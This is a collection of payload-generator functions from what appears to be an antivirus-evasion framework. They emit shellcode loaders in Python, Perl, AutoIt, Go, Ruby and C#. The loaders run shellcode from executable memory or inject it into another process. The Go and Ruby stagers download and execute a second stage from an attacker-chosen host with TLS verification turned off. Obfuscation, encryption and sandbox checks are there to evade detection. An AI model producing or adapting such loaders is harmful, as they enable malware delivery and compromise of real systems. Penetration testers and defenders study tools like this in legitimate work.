def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() RandPtr = evasion_helpers.randomString() RandHt = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() num_tabs_required = 0 payload_code = '' payload_code, num_tabs_required = gamemaker.senecas_games(self) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # How I'm tracking the number of nested tabs needed # to make the payload num_ends_required = 0 payload_code = "use Win32::API;\n" # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate variable names shellcode_variable = evasion_helpers.randomString() ptrName = evasion_helpers.randomString() rand_valloc = evasion_helpers.randomString() rand_movemem = evasion_helpers.randomString() rand_cthread = evasion_helpers.randomString() rand_waitfor = evasion_helpers.randomString() rand_heapcreate = evasion_helpers.randomString() rand_heapalloc = evasion_helpers.randomString() rand_thread = evasion_helpers.randomString() payload_code += '\t' * num_ends_required + "my $%s = \"%s\";\n" % (shellcode_variable, Shellcode) payload_code += '\t' * num_ends_required + "$" + rand_movemem + " = new Win32::API('kernel32', 'RtlMoveMemory', 'IPI', 'V');\n" payload_code += '\t' * num_ends_required + "$" + rand_cthread + " = new Win32::API('kernel32', 'CreateThread', 'IIIIIP', 'I');\n" payload_code += '\t' * num_ends_required + "$" + rand_waitfor + " = new Win32::API('kernel32', 'WaitForSingleObject', 'II', 'I');\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_ends_required + "$" + rand_valloc + " = new Win32::API('kernel32', 'VirtualAlloc', 'IIII', 'I');\n" payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_valloc + "->Call(0, length($" + shellcode_variable + "), 0x1000, 0x40);\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": rand_heapcrout = evasion_helpers.randomString() payload_code += '\t' * num_ends_required + "$" + rand_heapcreate + " = new Win32::API('kernel32', 'HeapCreate', 'III', 'I');\n" payload_code += '\t' * num_ends_required + "$" + rand_heapalloc + " = new Win32::API('kernel32', 'HeapAlloc', 'III', 'I');\n" payload_code += '\t' * num_ends_required + "my $" + rand_heapcrout + " = $" + rand_heapcreate + "->Call(0x00040000, length(" + shellcode_variable + ")*2, 0);\n" payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_heapalloc + "->Call($" + rand_heapcrout + ", 0x00000008, length(" + shellcode_variable + "));\n" payload_code += '\t' * num_ends_required + "$" + rand_movemem + "->Call($%s, $%s, length($%s));\n" % (ptrName, shellcode_variable, shellcode_variable ) payload_code += '\t' * num_ends_required + "my $" + rand_thread + " = $" + rand_cthread + "->Call(0, 0, $%s, 0, 0, 0);\n" % (ptrName) payload_code += '\t' * num_ends_required + "$" + rand_waitfor + "->Call($" + rand_thread + ", -1);\n" payload_code += '}\n' * num_ends_required self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # get it in AutoITs format Shellcode = "0x" + "".join(Shellcode.split("\\x")) total_size = len(Shellcode) RandFuncName = evasion_helpers.randomString() RandArgName = evasion_helpers.randomString() RandASMVarName = evasion_helpers.randomString() RandASMBufferName = evasion_helpers.randomString() RandBinBufferName = evasion_helpers.randomString() length_limit = 4000 # keep that pesky tray icon from appearing payload_code = "#NoTrayIcon\n" payload_code += RandFuncName + '(fileread("%WinDir%\\system32\\calc.exe"))\n' payload_code += 'Func ' + RandFuncName + '($' + RandArgName + ')\n' if total_size > length_limit: all_lines = [ Shellcode[i:i + length_limit] for i in range(0, len(Shellcode), length_limit) ] first_run = True for line in all_lines: if first_run: payload_code += '\tLocal $' + RandASMVarName + '="' + line + '"\n' first_run = False else: payload_code += '\t$' + RandASMVarName + ' = $' + RandASMVarName + ' & "' + line + '"\n' else: payload_code += '\tLocal $' + RandASMVarName + '="' + Shellcode + '"\n' payload_code += '\tLocal $' + RandASMBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandASMVarName + ') & "]")\n' payload_code += '\tLocal $' + RandBinBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandArgName + ') & "]")\n' payload_code += '\tDllStructSetData($' + RandASMBufferName + ', 1, $' + RandASMVarName + ')\n' payload_code += '\tDllStructSetData($' + RandBinBufferName + ', 1, $' + RandArgName + ')\n' payload_code += '\tLocal $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($' + RandASMBufferName + '), "ptr", DllStructGetPtr($' + RandBinBufferName + '), "int", 0, "int", 0, "int", 0)\n' payload_code += "EndFunc\n" self.payload_source_code = payload_code return
def system_checks(self): rand_username = evasion_helpers.randomString() rand_error1 = evasion_helpers.randomString() rand_hostname = evasion_helpers.randomString() rand_error2 = evasion_helpers.randomString() rand_processor = evasion_helpers.randomString() rand_domain = evasion_helpers.randomString() rand_error3 = evasion_helpers.randomString() num_ends = 0 check_code = '' if self.required_options["USERNAME"][0].lower() != "x": check_code += rand_username + ", " + rand_error1 + " := user.Current()\n" check_code += "if " + rand_error1 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + self.required_options[ "USERNAME"][0] + "\")) {\n" num_ends += 1 if self.required_options["HOSTNAME"][0].lower() != "x": check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n" check_code += "if " + rand_error2 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + self.required_options[ "HOSTNAME"][0] + "\")) {\n" num_ends += 1 if self.required_options["PROCESSORS"][0].lower() != "x": check_code += rand_processor + " := runtime.NumCPU()\n" check_code += "if " + rand_processor + " >= " + self.required_options[ "PROCESSORS"][0] + " {\n" num_ends += 1 return check_code, num_ends
def generate(self): payload_code, num_tabs_required = gamemaker.senecas_games(self) # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Generate Random Variable Names ShellcodeVariableName = evasion_helpers.randomString() pid_num_variable = evasion_helpers.randomString() pagerwx_variable = evasion_helpers.randomString() processall_variable = evasion_helpers.randomString() memcommit_variable = evasion_helpers.randomString() shell_length_variable = evasion_helpers.randomString() memalloc_variable = evasion_helpers.randomString() prochandle_variable = evasion_helpers.randomString() kernel32_variable = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * num_tabs_required + 'from ctypes import *\n' payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n' payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n' payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n' payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options[ "PID_NUMBER"][0] + '\n' payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def buildAryaLauncher(raw): """ Takes a raw set of bytes and builds a launcher shell to b64decode/decrypt a string rep of the bytes, and then use reflection to invoke the original .exe """ # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random())) base64payload = b64sub(raw, key) payload_code = "using System; using System.Collections.Generic; using System.Text;" payload_code += "using System.IO; using System.Reflection; using System.Linq;\n" decodeFuncName = evasion_helpers.randomString() baseStringName = evasion_helpers.randomString() targetStringName = evasion_helpers.randomString() dictionaryName = evasion_helpers.randomString() # build out the letter sub decrypt function payload_code += "namespace %s { class %s { private static string %s(string t, string k) {\n" % (evasion_helpers.randomString(), evasion_helpers.randomString(), decodeFuncName) payload_code += "string %s = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n" % (baseStringName) payload_code += "string %s = \"\"; Dictionary<char, char> %s = new Dictionary<char, char>();\n" % (targetStringName, dictionaryName) payload_code += "for (int i = 0; i < %s.Length; ++i){ %s.Add(k[i], %s[i]); }\n" % (baseStringName, dictionaryName,baseStringName) payload_code += "for (int i = 0; i < t.Length; ++i){ if ((t[i] >= 'A' && t[i] <= 'Z') || (t[i] >= 'a' && t[i] <= 'z')) { %s += %s[t[i]];}\n" % (targetStringName, dictionaryName) payload_code += "else { %s += t[i]; }} return %s; }\n" % (targetStringName, targetStringName) base64PayloadName = evasion_helpers.randomString() assemblyName = evasion_helpers.randomString() # build out Main() assemblyName = evasion_helpers.randomString() methodInfoName = evasion_helpers.randomString() keyName = evasion_helpers.randomString() payload_code += "static void Main() {\n" payload_code += "string %s = \"%s\";\n" % (base64PayloadName, base64payload) payload_code += "string %s = \"%s\";\n" % (keyName, key) # load up the assembly of the decoded binary payload_code += "Assembly %s = Assembly.Load(Convert.FromBase64String(%s(%s, %s)));\n" % (assemblyName, decodeFuncName, base64PayloadName, keyName) payload_code += "MethodInfo %s = %s.EntryPoint;\n" % (methodInfoName, assemblyName) # use reflection to jump to its entry point payload_code += "%s.Invoke(%s.CreateInstance(%s.Name), null);\n" % (methodInfoName, assemblyName, methodInfoName) payload_code += "}}}\n" return payload_code
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # get it in AutoITs format Shellcode = "0x" + "".join(Shellcode.split("\\x")) RandFuncName = evasion_helpers.randomString() RandArgName = evasion_helpers.randomString() RandASMVarName = evasion_helpers.randomString() RandASMBufferName = evasion_helpers.randomString() RandBinBufferName = evasion_helpers.randomString() # keep that pesky tray icon from appearing payload_code = "#NoTrayIcon\n" payload_code += RandFuncName + '(fileread("%WinDir%\\system32\\calc.exe"))\n' payload_code += 'Func ' + RandFuncName + '($' + RandArgName + ')\n' payload_code += '\tLocal $' + RandASMVarName + '="' + Shellcode + '"\n' payload_code += '\tLocal $' + RandASMBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandASMVarName + ') & "]")\n' payload_code += '\tLocal $' + RandBinBufferName + ' = DllStructCreate("byte[" & BinaryLen($' + RandArgName + ') & "]")\n' payload_code += '\tDllStructSetData($' + RandASMBufferName + ', 1, $' + RandASMVarName + ')\n' payload_code += '\tDllStructSetData($' + RandBinBufferName + ', 1, $' + RandArgName + ')\n' payload_code += '\tLocal $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($' + RandASMBufferName + '), "ptr", DllStructGetPtr($' + RandBinBufferName + '), "int", 0, "int", 0, "int", 0)\n' payload_code += "EndFunc\n" self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode payload_code, num_tabs_required = gamemaker.senecas_games(self) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": HeapVar = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): memCommit = evasion_helpers.randomString() memReserve = evasion_helpers.randomString() pageExecRW = evasion_helpers.randomString() kernel32 = evasion_helpers.randomString() procVirtualAlloc = evasion_helpers.randomString() base64Url = evasion_helpers.randomString() virtualAlloc = evasion_helpers.randomString() size = evasion_helpers.randomString() allocvarout = evasion_helpers.randomString() err = evasion_helpers.randomString() randBase = evasion_helpers.randomString() length = evasion_helpers.randomString() foo = evasion_helpers.randomString() random = evasion_helpers.randomString() outp = evasion_helpers.randomString() i = evasion_helpers.randomString() randTextBase64URL = evasion_helpers.randomString() getURI = evasion_helpers.randomString() sumVar = evasion_helpers.randomString() checksum8 = evasion_helpers.randomString() uri = evasion_helpers.randomString() value = evasion_helpers.randomString() tr = evasion_helpers.randomString() client = evasion_helpers.randomString() hostAndPort = evasion_helpers.randomString() port = self.required_options["LPORT"][0] host = self.required_options["LHOST"][0] response = evasion_helpers.randomString() uriLength = randint(5, 255) payload = evasion_helpers.randomString() bufferVar = evasion_helpers.randomString() x = evasion_helpers.randomString() heapcreatevariable = evasion_helpers.randomString() heapallocvariable = evasion_helpers.randomString() heapcreateout = evasion_helpers.randomString() cust_func = evasion_helpers.randomString() errorvariable = evasion_helpers.randomString() errorvariabledos = evasion_helpers.randomString() # sandbox check code sandbox_checks, num_curlys = gamemaker.senecas_games(self) # Todo: randomize import order payload_code = "package main\nimport (\n\"syscall\"\n\"unsafe\"\n" payload_code += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n\"crypto/tls\"\n" if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += "\"runtime\"\n" # Add in other imports based on checks being performed if self.required_options["USERNAME"][0].lower() != "x": payload_code += "\"strings\"\n\"os\"\n\"os/user\"\n" if self.required_options["HOSTNAME"][0].lower() != "x": if "strings" not in payload_code: payload_code += "\"strings\"\n" if "os" not in payload_code: payload_code += "\"os\"\n" payload_code += ")\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "const (\n" payload_code += "%s = 0x1000\n" % (memCommit) payload_code += "%s = 0x2000\n" % (memReserve) payload_code += "%s = 0x40\n)\n" % (pageExecRW) payload_code += "var (\n" payload_code += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n" % ( base64Url) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" % ( kernel32) payload_code += "%s = %s.NewProc(\"VirtualAlloc\")\n)\n" % ( procVirtualAlloc, kernel32) payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" % ( allocvarout, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW) payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % ( allocvarout, err, allocvarout) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += kernel32 + " = syscall.NewLazyDLL(\"kernel32.dll\")\n" payload_code += heapcreatevariable + " = " + kernel32 + ".NewProc(\"HeapCreate\")\n" payload_code += heapallocvariable + " = " + kernel32 + ".NewProc(\"HeapAlloc\")\n)\n" payload_code += "func %s(%s uintptr) (uintptr, error) {\n" % ( cust_func, size) payload_code += heapcreateout + ", _, " + errorvariable + " := " + heapcreatevariable + ".Call(0x00040000, " + size + ", 0)\n" payload_code += allocvarout + ", _, " + errorvariabledos + " := " + heapallocvariable + ".Call(" + heapcreateout + ", 0x00000008, " + size + ")\n" payload_code += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" % ( allocvarout, err, allocvarout) payload_code += "func %s(%s int, %s []byte) string {\n" % (randBase, length, foo) payload_code += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" % ( random) payload_code += "var %s []byte\n" % (outp) payload_code += "for %s := 0; %s < %s; %s++ {\n" % (i, i, length, i) payload_code += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" % ( outp, outp, foo, random, foo) payload_code += "return string(%s)\n}\n" % (outp) payload_code += "func %s(%s int) string {\n" % (randTextBase64URL, length) payload_code += "%s := []byte(%s)\n" % (foo, base64Url) payload_code += "return %s(%s, %s)\n}\n" % (randBase, length, foo) payload_code += "func %s(%s, %s int) string {\n" % (getURI, sumVar, length) payload_code += "for {\n%s := 0\n%s := %s(%s)\n" % ( checksum8, uri, randTextBase64URL, length) payload_code += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" % ( value, uri, checksum8, value) payload_code += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" % ( checksum8, '%0x100', sumVar, uri) payload_code += "func main() {\n" # Sandbox code goes here if sandbox_checks != '': payload_code += sandbox_checks payload_code += "%s := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}\n" % ( tr) payload_code += "%s := http.Client{Transport: %s}\n" % (client, tr) payload_code += "%s := \"https://%s:%s\"\n" % (hostAndPort, host, port) payload_code += "%s, _ := %s.Get(%s + %s(92, %s))\n" % ( response, client, hostAndPort, getURI, uriLength) payload_code += "defer %s.Body.Close()\n" % (response) payload_code += "%s, _ := ioutil.ReadAll(%s.Body)\n" % (payload, response) payload_code += "%s, _ := %s(uintptr(len(%s)))\n" % ( allocvarout, cust_func, payload) payload_code += "%s := (*[990000]byte)(unsafe.Pointer(%s))\n" % ( bufferVar, allocvarout) payload_code += "for %s, %s := range %s {\n" % (x, value, payload) payload_code += "%s[%s] = %s\n}\n" % (bufferVar, x, value) payload_code += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" % (allocvarout) payload_code += '}' * num_curlys self.payload_source_code = payload_code return
def generate(self): payload_code = '' payload_code = "require 'rubygems';require 'uri';require 'win32/api';require 'net/https';require 'openssl';include Win32\n" # Add logic for adding this line, stupid bug and I have no idea # why this is even a problem, but ruby is dumb if self.required_options["HOSTNAME"][0] != "X" or self.required_options[ "DOMAIN"][0] != "X" or self.required_options["USERNAME"][ 0] != "X" or self.required_options["SLEEP"][0] != "X": pass else: payload_code += "exit if Object.const_defined?(:Ocra)\n" if self.required_options["HOSTNAME"][ 0] != "X" or self.required_options["DOMAIN"][0] != "X": payload_code += 'require \'socket\'\n' payload_code2, num_ends_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 # randomly generate out variable names ptrName = evasion_helpers.randomString() threadName = evasion_helpers.randomString() heap_name = evasion_helpers.randomString() valloc_random = evasion_helpers.randomString() rtlmove_random = evasion_helpers.randomString() createthread_random = evasion_helpers.randomString() waitfor_random = evasion_helpers.randomString() heapcreate_random = evasion_helpers.randomString() heapalloc_random = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n" payload_code += "def ch()\n" #payload_code += "\tchk = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n" #payload_code += "\t32.times do\n" #payload_code += "\t\turi = chk.sample(3).join()\n" #payload_code += "\t\tchk.sort_by {rand}.each do |x|\n" #payload_code += "\t\t\treturn(uri + x) if (uri + x).unpack(\"C*\").inject(:+) % 0x100 == 92\n" #payload_code += "\t\tend\n" #payload_code += "\tend\n" payload_code += "\treturn \"WEZf\"\n" payload_code += "end\n" payload_code += "def ij(sc)\n" payload_code += "\tif sc.length > 1000\n" if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n" elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n" payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n" payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n" payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n" payload_code += "\tend\nend\n" payload_code += "uri = URI.parse(\"https://%s:%s/#{ch()}\")\n" % ( self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += "http = Net::HTTP.new(uri.host, uri.port)\n" payload_code += "http.use_ssl = true\n" payload_code += "http.verify_mode = OpenSSL::SSL::VERIFY_NONE\n" payload_code += "request = Net::HTTP::Get.new(uri.request_uri)\n" payload_code += "response = http.request(request)\n" payload_code += "ij(response.body)\n" # Close out all the if statements for iteration in range(num_ends_required): payload_code += 'end\n' self.payload_source_code = payload_code return
